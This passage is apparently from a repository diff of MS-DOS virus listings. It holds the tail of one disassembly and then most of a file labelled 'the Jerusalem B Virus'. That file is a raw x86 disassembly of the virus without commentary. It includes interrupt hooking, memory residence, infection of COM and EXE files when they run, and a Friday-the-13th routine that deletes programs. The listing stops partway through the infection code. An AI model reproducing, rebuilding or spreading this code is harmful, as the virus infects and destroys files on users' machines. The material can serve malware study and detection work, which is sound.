0000:05EB 5A POP DX
0000:05EC 59 POP CX
0000:05ED 5B POP BX
0000:05EE 58 POP AX
0000:05EF 9D POPF
0000:05F0 2EFF2E1700 JMP CS:[Y0017H]
0000:05F5 0000 X05F5: ADD [BX+SI],AL
0000:05F7 0000 ADD [BX+SI],AL
0000:05F9 0000 ADD [BX+SI],AL
0000:05FB 0000 ADD [BX+SI],AL
0000:05FD 0000 ADD [BX+SI],AL
0000:05FF 004D00 ADD [DI+00H],CL
0000:0602 000F ADD [BX],CL
0000:0604 0000 ADD [BX+SI],AL
0000:0606 0000 ADD [BX+SI],AL
"JV.MOC" PAGE 0012
0000:0608 0000 ADD [BX+SI],AL
0000:060A 0000 ADD [BX+SI],AL
0000:060C 0000 ADD [BX+SI],AL
0000:060E 0000 ADD [BX+SI],AL
0000:0610 CD20 INT 020H
0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH
0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID
0000:0619 F02F LOCK DAS
0000:061B 018E1E3C ADD [BP+Y03C1EH],CX
0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX
0000:0623 048E ADD AL,08EH
0000:0625 1E PUSH DS
0000:0626 8E1EFFFF MOV DS,[Y0FFFFH]
0000:062A FFFF ??? DI
0000:062C FFFF ??? DI
0000:062E FFFF ??? DI
0000:0630 FFFF ??? DI
0000:0632 FFFF ??? DI
0000:0634 FFFF ??? DI
0000:0636 FFFF ??? DI
0000:0638 FFFF ??? DI
0000:063A FFFF ??? DI
0000:063C 7C1F JL X065D
0000:063E DE3E8D29 ESC 037H,[Y0298DH]
0000:0642 1400 ADC AL,00H
0000:0644 1800 SBB [BX+SI],AL
0000:0646 F1 DB 0F1H
0000:0647 1F POP DS
0000:0648 FFFF ??? DI
0000:064A FFFF ??? DI
0000:064C 0000 ADD [BX+SI],AL
0000:064E 0000 ADD [BX+SI],AL
0000:0650 0000 ADD [BX+SI],AL
0000:0652 0000 ADD [BX+SI],AL
0000:0654 0000 ADD [BX+SI],AL
0000:0656 0000 ADD [BX+SI],AL
0000:0658 0000 ADD [BX+SI],AL
0000:065A 0000 ADD [BX+SI],AL
0000:065C 0000 ADD [BX+SI],AL
0000:065E 0000 ADD [BX+SI],AL
0000:0660 CD21 INT 021H
0000:0662 CB RET ; INTERSEGMENT
0000:0663 0000 X0663: ADD [BX+SI],AL
0000:0665 0000 ADD [BX+SI],AL
0000:0667 0000 ADD [BX+SI],AL
0000:0669 0000 ADD [BX+SI],AL
0000:066B 0000 ADD [BX+SI],AL
0000:066D 2020 AND [BX+SI],AH
0000:066F 2020 AND [BX+SI],AH
0000:0671 2020 AND [BX+SI],AH
0000:0673 2020 AND [BX+SI],AH
0000:0675 2020 AND [BX+SI],AH
0000:0677 2000 AND [BX+SI],AL
0000:0679 0000 ADD [BX+SI],AL
0000:067B 0000 ADD [BX+SI],AL
0000:067D 2020 AND [BX+SI],AH
"JV.MOC" PAGE 0013
0000:067F 2020 AND [BX+SI],AH
0000:0681 2020 AND [BX+SI],AH
0000:0683 2020 AND [BX+SI],AH
0000:0685 2020 AND [BX+SI],AH
0000:0687 2000 AND [BX+SI],AL
0000:0689 0000 ADD [BX+SI],AL
0000:068B 0000 ADD [BX+SI],AL
0000:068D 0000 ADD [BX+SI],AL
0000:068F 0000 ADD [BX+SI],AL
0000:0691 0D6B6F OR AX,06F6BH
0000:0694 6465 JZ X06FB
0000:0696 6572 JNZ X070A
0000:0698 7A2E JPE X06C8
0000:069A 6578 JNZ X0714
0000:069C 6520 JNZ X06BE
0000:069E 613A JNO X06DA
0000:06A0 6B6F JPO X0711
0000:06A2 6465 JZ X0709
0000:06A4 6572 JNZ X0718
0000:06A6 2E6578 JNZ X0721
0000:06A9 650D JNZ X06B8
0000:06AB 0000 ADD [BX+SI],AL
0000:06AD 0000 ADD [BX+SI],AL
0000:06AF 0000 ADD [BX+SI],AL
0000:06B1 0000 ADD [BX+SI],AL
0000:06B3 0000 ADD [BX+SI],AL
0000:06B5 0000 ADD [BX+SI],AL
0000:06B7 0000 ADD [BX+SI],AL
0000:06B9 0000 ADD [BX+SI],AL
0000:06BB 0000 ADD [BX+SI],AL
0000:06BD 0000 ADD [BX+SI],AL
0000:06BF 0000 ADD [BX+SI],AL
0000:06C1 0000 ADD [BX+SI],AL
0000:06C3 0000 ADD [BX+SI],AL
0000:06C5 0000 ADD [BX+SI],AL
0000:06C7 0000 ADD [BX+SI],AL
0000:06C9 0000 ADD [BX+SI],AL
0000:06CB 0000 ADD [BX+SI],AL
0000:06CD 0000 ADD [BX+SI],AL
0000:06CF 0000 ADD [BX+SI],AL
0000:06D1 0000 ADD [BX+SI],AL
0000:06D3 0000 ADD [BX+SI],AL
0000:06D5 0000 ADD [BX+SI],AL
0000:06D7 0000 ADD [BX+SI],AL
0000:06D9 005718 ADD [BX+018H],DL
0000:06DC 0825 OR [DI],AH
0000:06DE A5 MOVSW
0000:06DF FEC5 INC CH
0000:06E1 07 POP ES
0000:06E2 1E PUSH DS
0000:06E3 0210 ADD DL,[BX+SI]
0000:06E5 07 POP ES
0000:06E6 57 PUSH DI
0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH
0000:06EB 0104 ADD [SI],AX
0000:06ED 7F70 JG X075F
"JV.MOC" PAGE 0014
0000:06EF 0010 ADD [BX+SI],DL
0000:06F1 07 POP ES
0000:06F2 1D001C SBB AX,01C00H
0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP
0000:06F9 0C1B OR AL,01BH
0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH]
0000:06FF F24D REPNE DEC BP
0000:0701 360E PUSH CS
0000:0703 0300 ADD AX,[BX+SI]
0000:0705 0000 ADD [BX+SI],AL
0000:0707 00EE ADD DH,CH
0000:0709 002A X0709: ADD [BP+SI],CH
0000:070B 0F POP CS
0000:070C 42 INC DX
0000:070D 01C1 ADD CX,AX
0000:070F 0DB44C OR AX,04CB4H
0000:0712 B000 MOV AL,00H
0000:0714 CD21 X0714: INT 021H
0000:0716 4D DEC BP
0000:0717 7344 JAE X075D
0000:0719 6F73 JG X078E

MSDOS/J-Index/Virus.MSDOS.Unknown.jeru-s.lst
+794
View File
@@ -0,0 +1,794 @@
This is the Jerusalem B Virus.
"JV.MOC" PAGE 0001
0000:0000 E99200 JMP X0095
0000:0003 7355 JAE X005A
0000:0005 4D DEC BP
0000:0006 7344 JAE X004C
0000:0008 6F73 JG X007D
0000:000A 0001 ADD [BX+DI],AL
0000:000C BD1700 MOV BP,0017H
0000:000F 0000 ADD [BX+SI],AL
0000:0011 06 PUSH ES
0000:0012 00A5FE00 ADD [DI+Y00FEH],AH
0000:0016 F016 LOCK PUSH SS
0000:0018 17 POP SS
0000:0019 7702 JA X001D
0000:001B BF053D MOV DI,03D05H
0000:001E 0CFB OR AL,0FBH
0000:0020 7D00 JGE X0022
0000:0022 0000 X0022: ADD [BX+SI],AL
0000:0024 0000 ADD [BX+SI],AL
0000:0026 0000 ADD [BX+SI],AL
0000:0028 0000 ADD [BX+SI],AL
0000:002A 0000 ADD [BX+SI],AL
0000:002C 0000 ADD [BX+SI],AL
0000:002E E8062A CALL X2A37
0000:0031 B10D MOV CL,0DH
0000:0033 800000 ADD BYTE PTR [BX+SI],00H
0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL
0000:003A 0D5C00 OR AX,005CH
0000:003D B10D MOV CL,0DH
0000:003F 6C00 JL X0041
0000:0041 B10D X0041: MOV CL,0DH
0000:0043 0004 ADD [SI],AL
0000:0045 5F POP DI
0000:0046 0F POP CS
0000:0047 B400 MOV AH,00H
0000:0049 C1 RET ; INTRASEGMENT
0000:004A 0D00F0 X004A: OR AX,0F000H
0000:004D 06 PUSH ES
0000:004E 004D5A ADD [DI+05AH],CL
0000:0051 2000 AND [BX+SI],AL
0000:0053 1000 ADC [BX+SI],AL
0000:0055 1900 SBB [BX+SI],AX
0000:0057 0800 OR [BX+SI],AL
0000:0059 7500 JNZ X005B
0000:005B 7500 X005B: JNZ X005D
0000:005D 6901 X005D: JNS X0060
0000:005F 1007 ADC [BX],AL
0000:0061 8419 TEST BL,[BX+DI]
0000:0063 C500 LDS AX,[BX+SI]
0000:0065 6901 JNS X0068
0000:0067 1C00 SBB AL,00H
0000:0069 0000 ADD [BX+SI],AL
0000:006B 4C X006B: DEC SP
0000:006C B000 MOV AL,00H
0000:006E CD21 INT 021H
0000:0070 050020 ADD AX,02000H
0000:0073 0037 ADD [BX],DH
"JV.MOC" PAGE 0002
0000:0075 121C ADC BL,[SI]
0000:0077 0100 ADD [BX+SI],AX
0000:0079 0210 ADD DL,[BX+SI]
0000:007B 0010 ADD [BX+SI],DL
0000:007D 17 X007D: POP SS
0000:007E 0000 ADD [BX+SI],AL
0000:0080 53 PUSH BX
0000:0081 61E8 JNO X006B
0000:0083 38434F CMP [BP+DI+04FH],AL
0000:0086 4D DEC BP
0000:0087 4D DEC BP
0000:0088 41 INC CX
0000:0089 4E DEC SI
0000:008A 44 INC SP
0000:008B 2E43 INC BX
0000:008D 4F DEC DI
0000:008E 4D DEC BP
0000:008F 0100 ADD [BX+SI],AX
0000:0091 0000 ADD [BX+SI],AL
0000:0093 0000 ADD [BX+SI],AL
0000:0095 FC X0095: CLD
0000:0096 B4E0 MOV AH,0E0H
0000:0098 CD21 INT 021H
0000:009A 80FCE0 CMP AH,0E0H
0000:009D 7316 JAE X00B5
0000:009F 80FC03 CMP AH,03H
0000:00A2 7211 JB X00B5
0000:00A4 B4DD MOV AH,0DDH
0000:00A6 BF0001 MOV DI,0100H
0000:00A9 BE1007 MOV SI,0710H
0000:00AC 03F7 ADD SI,DI
0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H]
0000:00B3 CD21 INT 021H
0000:00B5 8CC8 X00B5: MOV AX,CS
0000:00B7 051000 ADD AX,0010H
0000:00BA 8ED0 MOV SS,AX
0000:00BC BC0007 MOV SP,0700H
0000:00BF 50 PUSH AX
0000:00C0 B8C500 MOV AX,00C5H
0000:00C3 50 PUSH AX
0000:00C4 CB RET ; INTERSEGMENT
0000:00C5 FC X00C5: CLD
0000:00C6 06 PUSH ES
0000:00C7 2E8C063100 MOV CS:[Y0031H],ES
0000:00CC 2E8C063900 MOV CS:[Y0039H],ES
0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES
0000:00D6 2E8C064100 MOV CS:[Y0041H],ES
0000:00DB 8CC0 MOV AX,ES
0000:00DD 051000 ADD AX,0010H
0000:00E0 2E01064900 ADD CS:[Y0049H],AX
0000:00E5 2E01064500 ADD CS:[Y0045H],AX
0000:00EA B4E0 MOV AH,0E0H
0000:00EC CD21 INT 021H
0000:00EE 80FCE0 CMP AH,0E0H
0000:00F1 7313 JAE X0106
0000:00F3 80FC03 CMP AH,03H
"JV.MOC" PAGE 0003
0000:00F6 07 POP ES
0000:00F7 2E8E164500 MOV SS,CS:[Y0045H]
0000:00FC 2E8B264300 MOV SP,CS:[Y0043H]
0000:0101 2EFF2E4700 JMP CS:[Y0047H]
0000:0106 33C0 X0106: XOR AX,AX
0000:0108 8EC0 MOV ES,AX
0000:010A 26A1FC03 MOV AX,ES:Y03FCH
0000:010E 2EA34B00 MOV CS:Y004BH,AX
0000:0112 26A0FE03 MOV AL,ES:Y03FEH
0000:0116 2EA24D00 MOV CS:Y004DH,AL
0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H
0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH
0000:0127 58 POP AX
0000:0128 051000 ADD AX,0010H
0000:012B 8EC0 MOV ES,AX
0000:012D 0E PUSH CS
0000:012E 1F POP DS
0000:012F B91007 MOV CX,0710H
0000:0132 D1E9 SHR CX,1
0000:0134 33F6 XOR SI,SI
0000:0136 8BFE MOV DI,SI
0000:0138 06 PUSH ES
0000:0139 B84201 MOV AX,0142H
0000:013C 50 PUSH AX
0000:013D EAFC030000 JMP X0000_03FC
0000:0142 8CC8 MOV AX,CS
0000:0144 8ED0 MOV SS,AX
0000:0146 BC0007 MOV SP,0700H
0000:0149 33C0 XOR AX,AX
0000:014B 8ED8 MOV DS,AX
0000:014D 2EA14B00 MOV AX,CS:Y004BH
0000:0151 A3FC03 MOV Y03FCH,AX
0000:0154 2EA04D00 MOV AL,CS:Y004DH
0000:0158 A2FE03 MOV Y03FEH,AL
0000:015B 8BDC MOV BX,SP
0000:015D B104 MOV CL,04H
0000:015F D3EB SHR BX,CL
0000:0161 83C310 ADD BX,0010H
0000:0164 2E891E3300 MOV CS:[Y0033H],BX
0000:0169 B44A MOV AH,04AH
0000:016B 2E8E063100 MOV ES,CS:[Y0031H]
0000:0170 CD21 INT 021H
0000:0172 B82135 MOV AX,03521H
0000:0175 CD21 INT 021H
0000:0177 2E891E1700 MOV CS:[Y0017H],BX
0000:017C 2E8C061900 MOV CS:[Y0019H],ES
0000:0181 0E PUSH CS
0000:0182 1F POP DS
0000:0183 BA5B02 MOV DX,025BH
0000:0186 B82125 MOV AX,02521H
0000:0189 CD21 INT 021H
0000:018B 8E063100 MOV ES,[Y0031H]
0000:018F 268E062C00 MOV ES,ES:[Y002CH]
0000:0194 33FF XOR DI,DI
0000:0196 B9FF7F MOV CX,07FFFH
0000:0199 32C0 XOR AL,AL
"JV.MOC" PAGE 0004
0000:019B F2AE X019B: REPNE SCASB
0000:019D 263805 CMP ES:[DI],AL
0000:01A0 E0F9 LOOPNZ X019B
0000:01A2 8BD7 MOV DX,DI
0000:01A4 83C203 ADD DX,0003H
0000:01A7 B8004B MOV AX,04B00H
0000:01AA 06 PUSH ES
0000:01AB 1F POP DS
0000:01AC 0E PUSH CS
0000:01AD 07 POP ES
0000:01AE BB3500 MOV BX,0035H
0000:01B1 1E PUSH DS
0000:01B2 06 PUSH ES
0000:01B3 50 PUSH AX
0000:01B4 53 PUSH BX
0000:01B5 51 PUSH CX
0000:01B6 52 PUSH DX
0000:01B7 B42A MOV AH,02AH
0000:01B9 CD21 INT 021H
0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H
0000:01C1 81F9C307 CMP CX,07C3H
0000:01C5 7430 JZ X01F7
0000:01C7 3C05 CMP AL,05H
0000:01C9 750D JNZ X01D8
0000:01CB 80FA0D CMP DL,0DH
0000:01CE 7508 JNZ X01D8
0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH]
0000:01D5 EB20 JMP X01F7
0000:01D7 90 NOP
0000:01D8 B80835 X01D8: MOV AX,03508H
0000:01DB CD21 INT 021H
0000:01DD 2E891E1300 MOV CS:[Y0013H],BX
0000:01E2 2E8C061500 MOV CS:[Y0015H],ES
0000:01E7 0E PUSH CS
0000:01E8 1F POP DS
0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H
0000:01EF B80825 MOV AX,02508H
0000:01F2 BA1E02 MOV DX,021EH
0000:01F5 CD21 INT 021H
0000:01F7 5A X01F7: POP DX
0000:01F8 59 POP CX
0000:01F9 5B POP BX
0000:01FA 58 POP AX
0000:01FB 07 POP ES
0000:01FC 1F POP DS
0000:01FD 9C PUSHF
0000:01FE 2EFF1E1700 CALL CS:[Y0017H]
0000:0203 1E PUSH DS
0000:0204 07 POP ES
0000:0205 B449 MOV AH,049H
0000:0207 CD21 INT 021H
0000:0209 B44D MOV AH,04DH
0000:020B CD21 INT 021H
0000:020D B431 MOV AH,031H
0000:020F BA0006 MOV DX,0600H
0000:0212 B104 MOV CL,04H
"JV.MOC" PAGE 0005
0000:0214 D3EA SHR DX,CL
0000:0216 83C210 ADD DX,0010H
0000:0219 CD21 INT 021H
0000:021B 32C0 XOR AL,AL
0000:021D CF IRET
0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H
0000:0224 7517 JNZ X023D
0000:0226 50 PUSH AX
0000:0227 53 PUSH BX
0000:0228 51 PUSH CX
0000:0229 52 PUSH DX
0000:022A 55 PUSH BP
0000:022B B80206 MOV AX,0602H
0000:022E B787 MOV BH,087H
0000:0230 B90505 MOV CX,0505H
0000:0233 BA1010 MOV DX,01010H
0000:0236 CD10 INT 010H
0000:0238 5D POP BP
0000:0239 5A POP DX
0000:023A 59 POP CX
0000:023B 5B POP BX
0000:023C 58 POP AX
0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH]
0000:0242 7512 JNZ X0256
0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H
0000:024B 50 PUSH AX
0000:024C 51 PUSH CX
0000:024D 56 PUSH SI
0000:024E B90140 MOV CX,04001H
0000:0251 F3AC REPE LODSB
0000:0253 5E POP SI
0000:0254 59 POP CX
0000:0255 58 POP AX
0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H]
0000:025B 9C X025B: PUSHF
0000:025C 80FCE0 CMP AH,0E0H
0000:025F 7505 JNZ X0266
0000:0261 B80003 MOV AX,0300H
0000:0264 9D POPF
0000:0265 CF IRET
0000:0266 80FCDD X0266: CMP AH,0DDH
0000:0269 7413 JZ X027E
0000:026B 80FCDE CMP AH,0DEH
0000:026E 7428 JZ X0298
0000:0270 3D004B CMP AX,04B00H
0000:0273 7503 JNZ X0278
0000:0275 E9B400 JMP X032C
0000:0278 9D X0278: POPF
0000:0279 2EFF2E1700 JMP CS:[Y0017H]
0000:027E 58 X027E: POP AX
0000:027F 58 POP AX
0000:0280 B80001 MOV AX,0100H
0000:0283 2EA30A00 MOV CS:Y000AH,AX
0000:0287 58 POP AX
0000:0288 2EA30C00 MOV CS:Y000CH,AX
0000:028C F3A4 REPE MOVSB
"JV.MOC" PAGE 0006
0000:028E 9D POPF
0000:028F 2EA10F00 MOV AX,CS:Y000FH
0000:0293 2EFF2E0A00 JMP CS:[Y000AH]
0000:0298 83C406 X0298: ADD SP,0006H
0000:029B 9D POPF
0000:029C 8CC8 MOV AX,CS
0000:029E 8ED0 MOV SS,AX
0000:02A0 BC1007 MOV SP,0710H
0000:02A3 06 PUSH ES
0000:02A4 06 PUSH ES
0000:02A5 33FF XOR DI,DI
0000:02A7 0E PUSH CS
0000:02A8 07 POP ES
0000:02A9 B91000 MOV CX,0010H
0000:02AC 8BF3 MOV SI,BX
0000:02AE BF2100 MOV DI,0021H
0000:02B1 F3A4 REPE MOVSB
0000:02B3 8CD8 MOV AX,DS
0000:02B5 8EC0 MOV ES,AX
0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH]
0000:02BC 2E03062B00 ADD AX,CS:[Y002BH]
0000:02C1 83D200 ADC DX,0000H
0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH]
0000:02C9 8ED8 MOV DS,AX
0000:02CB 8BF2 MOV SI,DX
0000:02CD 8BFA MOV DI,DX
0000:02CF 8CC5 MOV BP,ES
0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH]
0000:02D6 0BDB OR BX,BX
0000:02D8 7413 JZ X02ED
0000:02DA B90080 X02DA: MOV CX,08000H
0000:02DD F3A5 REPE MOVSW
0000:02DF 050010 ADD AX,01000H
0000:02E2 81C50010 ADD BP,01000H
0000:02E6 8ED8 MOV DS,AX
0000:02E8 8EC5 MOV ES,BP
0000:02EA 4B DEC BX
0000:02EB 75ED JNZ X02DA
0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH]
0000:02F2 F3A4 REPE MOVSB
0000:02F4 58 POP AX
0000:02F5 50 PUSH AX
0000:02F6 051000 ADD AX,0010H
0000:02F9 2E01062900 ADD CS:[Y0029H],AX
0000:02FE 2E01062500 ADD CS:[Y0025H],AX
0000:0303 2EA12100 MOV AX,CS:Y0021H
0000:0307 1F POP DS
0000:0308 07 POP ES
0000:0309 2E8E162900 MOV SS,CS:[Y0029H]
0000:030E 2E8B262700 MOV SP,CS:[Y0027H]
0000:0313 2EFF2E2300 JMP CS:[Y0023H]
0000:0318 33C9 X0318: XOR CX,CX
0000:031A B80143 MOV AX,04301H
0000:031D CD21 INT 021H
0000:031F B441 MOV AH,041H
0000:0321 CD21 INT 021H
"JV.MOC" PAGE 0007
0000:0323 B8004B MOV AX,04B00H
0000:0326 9D POPF
0000:0327 2EFF2E1700 JMP CS:[Y0017H]
0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H
0000:0332 74E4 JZ X0318
0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H
0000:0342 2E89168000 MOV CS:[Y0080H],DX
0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS
0000:034C 50 PUSH AX
0000:034D 53 PUSH BX
0000:034E 51 PUSH CX
0000:034F 52 PUSH DX
0000:0350 56 PUSH SI
0000:0351 57 PUSH DI
0000:0352 1E PUSH DS
0000:0353 06 PUSH ES
0000:0354 FC CLD
0000:0355 8BFA MOV DI,DX
0000:0357 32D2 XOR DL,DL
0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH
0000:035D 7505 JNZ X0364
0000:035F 8A15 MOV DL,[DI]
0000:0361 80E21F AND DL,01FH
0000:0364 B436 X0364: MOV AH,036H
0000:0366 CD21 INT 021H
0000:0368 3DFFFF CMP AX,0FFFFH
0000:036B 7503 JNZ X0370
0000:036D E97702 X036D: JMP X05E7
0000:0370 F7E3 X0370: MUL BX
0000:0372 F7E1 MUL CX
0000:0374 0BD2 OR DX,DX
0000:0376 7505 JNZ X037D
0000:0378 3D1007 CMP AX,0710H
0000:037B 72F0 JB X036D
0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H]
0000:0382 1E PUSH DS
0000:0383 07 POP ES
0000:0384 32C0 XOR AL,AL
0000:0386 B94100 MOV CX,0041H
0000:0389 F2AE REPNE SCASB
0000:038B 2E8B368000 MOV SI,CS:[Y0080H]
0000:0390 8A04 X0390: MOV AL,[SI]
0000:0392 0AC0 OR AL,AL
0000:0394 740E JZ X03A4
0000:0396 3C61 CMP AL,061H
0000:0398 7207 JB X03A1
0000:039A 3C7A CMP AL,07AH
0000:039C 7703 JA X03A1
0000:039E 802C20 SUB BYTE PTR [SI],020H
0000:03A1 46 X03A1: INC SI
0000:03A2 EBEC JMP X0390
0000:03A4 B90B00 X03A4: MOV CX,000BH
0000:03A7 2BF1 SUB SI,CX
0000:03A9 BF8400 MOV DI,0084H
0000:03AC 0E PUSH CS
"JV.MOC" PAGE 0008
0000:03AD 07 POP ES
0000:03AE B90B00 MOV CX,000BH
0000:03B1 F3A6 REPE CMPSB
0000:03B3 7503 JNZ X03B8
0000:03B5 E92F02 JMP X05E7
0000:03B8 B80043 X03B8: MOV AX,04300H
0000:03BB CD21 INT 021H
0000:03BD 7205 JB X03C4
0000:03BF 2E890E7200 MOV CS:[Y0072H],CX
0000:03C4 7225 X03C4: JB X03EB
0000:03C6 32C0 XOR AL,AL
0000:03C8 2EA24E00 MOV CS:Y004EH,AL
0000:03CC 1E PUSH DS
0000:03CD 07 POP ES
0000:03CE 8BFA MOV DI,DX
0000:03D0 B94100 MOV CX,0041H
0000:03D3 F2AE REPNE SCASB
0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH
0000:03D9 740B JZ X03E6
0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH
0000:03DF 7405 JZ X03E6
0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH]
0000:03E6 B8003D X03E6: MOV AX,03D00H
0000:03E9 CD21 INT 021H
0000:03EB 725A X03EB: JB X0447
0000:03ED 2EA37000 MOV CS:Y0070H,AX
0000:03F1 8BD8 MOV BX,AX
0000:03F3 B80242 MOV AX,04202H
0000:03F6 B9FFFF MOV CX,0FFFFH
0000:03F9 BAFBFF MOV DX,0FFFBH
0000:03FC CD21 X03FC: INT 021H
0000:03FE 72EB JB X03EB
0000:0400 050500 ADD AX,0005H
0000:0403 2EA31100 MOV CS:Y0011H,AX
0000:0407 B90500 MOV CX,0005H
0000:040A BA6B00 MOV DX,006BH
0000:040D 8CC8 MOV AX,CS
0000:040F 8ED8 MOV DS,AX
0000:0411 8EC0 MOV ES,AX
0000:0413 B43F MOV AH,03FH
0000:0415 CD21 INT 021H
0000:0417 8BFA MOV DI,DX
0000:0419 BE0500 MOV SI,0005H
0000:041C F3A6 REPE CMPSB
0000:041E 7507 JNZ X0427
0000:0420 B43E MOV AH,03EH
0000:0422 CD21 INT 021H
0000:0424 E9C001 JMP X05E7
0000:0427 B82435 X0427: MOV AX,03524H
0000:042A CD21 INT 021H
0000:042C 891E1B00 MOV [Y001BH],BX
0000:0430 8C061D00 MOV [Y001DH],ES
0000:0434 BA1B02 MOV DX,021BH
0000:0437 B82425 MOV AX,02524H
0000:043A CD21 INT 021H
0000:043C C5168000 LDS DX,[Y0080H]
"JV.MOC" PAGE 0009
0000:0440 33C9 XOR CX,CX
0000:0442 B80143 MOV AX,04301H
0000:0445 CD21 INT 021H
0000:0447 723B X0447: JB X0484
0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:044E B43E MOV AH,03EH
0000:0450 CD21 INT 021H
0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:0459 B8023D MOV AX,03D02H
0000:045C CD21 INT 021H
0000:045E 7224 JB X0484
0000:0460 2EA37000 MOV CS:Y0070H,AX
0000:0464 8CC8 MOV AX,CS
0000:0466 8ED8 MOV DS,AX
0000:0468 8EC0 MOV ES,AX
0000:046A 8B1E7000 MOV BX,[Y0070H]
0000:046E B80057 MOV AX,05700H
0000:0471 CD21 INT 021H
0000:0473 89167400 MOV [Y0074H],DX
0000:0477 890E7600 MOV [Y0076H],CX
0000:047B B80042 MOV AX,04200H
0000:047E 33C9 XOR CX,CX
0000:0480 8BD1 MOV DX,CX
0000:0482 CD21 INT 021H
0000:0484 723D X0484: JB X04C3
0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H
0000:048B 7403 JZ X0490
0000:048D EB57 JMP X04E6
0000:048F 90 NOP
0000:0490 BB0010 X0490: MOV BX,01000H
0000:0493 B448 MOV AH,048H
0000:0495 CD21 INT 021H
0000:0497 730B JAE X04A4
0000:0499 B43E MOV AH,03EH
0000:049B 8B1E7000 MOV BX,[Y0070H]
0000:049F CD21 INT 021H
0000:04A1 E94301 JMP X05E7
0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH]
0000:04A8 8EC0 MOV ES,AX
0000:04AA 33F6 XOR SI,SI
0000:04AC 8BFE MOV DI,SI
0000:04AE B91007 MOV CX,0710H
0000:04B1 F3A4 REPE MOVSB
0000:04B3 8BD7 MOV DX,DI
0000:04B5 8B0E1100 MOV CX,[Y0011H]
0000:04B9 8B1E7000 MOV BX,[Y0070H]
0000:04BD 06 PUSH ES
0000:04BE 1F POP DS
0000:04BF B43F MOV AH,03FH
0000:04C1 CD21 INT 021H
0000:04C3 721C X04C3: JB X04E1
0000:04C5 03F9 ADD DI,CX
0000:04C7 33C9 XOR CX,CX
0000:04C9 8BD1 MOV DX,CX
0000:04CB B80042 MOV AX,04200H
0000:04CE CD21 INT 021H
"JV.MOC" PAGE 0010
0000:04D0 BE0500 MOV SI,0005H
0000:04D3 B90500 MOV CX,0005H
0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT
R (SI)
0000:04D9 8BCF MOV CX,DI
0000:04DB 33D2 XOR DX,DX
0000:04DD B440 MOV AH,040H
0000:04DF CD21 INT 021H
0000:04E1 720D X04E1: JB X04F0
0000:04E3 E9BC00 JMP X05A2
0000:04E6 B91C00 X04E6: MOV CX,001CH
0000:04E9 BA4F00 MOV DX,004FH
0000:04EC B43F MOV AH,03FH
0000:04EE CD21 INT 021H
0000:04F0 724A X04F0: JB X053C
0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H
0000:04F8 A15D00 MOV AX,Y005DH
0000:04FB A34500 MOV Y0045H,AX
0000:04FE A15F00 MOV AX,Y005FH
0000:0501 A34300 MOV Y0043H,AX
0000:0504 A16300 MOV AX,Y0063H
0000:0507 A34700 MOV Y0047H,AX
0000:050A A16500 MOV AX,Y0065H
0000:050D A34900 MOV Y0049H,AX
0000:0510 A15300 MOV AX,Y0053H
0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H
0000:0518 7401 JZ X051B
0000:051A 48 DEC AX
0000:051B F7267800 X051B: MUL WORD PTR [Y0078H]
0000:051F 03065100 ADD AX,[Y0051H]
0000:0523 83D200 ADC DX,0000H
0000:0526 050F00 ADD AX,000FH
0000:0529 83D200 ADC DX,0000H
0000:052C 25F0FF AND AX,0FFF0H
0000:052F A37C00 MOV Y007CH,AX
0000:0532 89167E00 MOV [Y007EH],DX
0000:0536 051007 ADD AX,0710H
0000:0539 83D200 ADC DX,0000H
0000:053C 723A X053C: JB X0578
0000:053E F7367800 DIV WORD PTR [Y0078H]
0000:0542 0BD2 OR DX,DX
0000:0544 7401 JZ X0547
0000:0546 40 INC AX
0000:0547 A35300 X0547: MOV Y0053H,AX
0000:054A 89165100 MOV [Y0051H],DX
0000:054E A17C00 MOV AX,Y007CH
0000:0551 8B167E00 MOV DX,[Y007EH]
0000:0555 F7367A00 DIV WORD PTR [Y007AH]
0000:0559 2B065700 SUB AX,[Y0057H]
0000:055D A36500 MOV Y0065H,AX
0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H
0000:0566 A35D00 MOV Y005DH,AX
0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H
0000:056F 33C9 XOR CX,CX
0000:0571 8BD1 MOV DX,CX
0000:0573 B80042 MOV AX,04200H
0000:0576 CD21 INT 021H
"JV.MOC" PAGE 0011
0000:0578 720A X0578: JB X0584
0000:057A B91C00 MOV CX,001CH
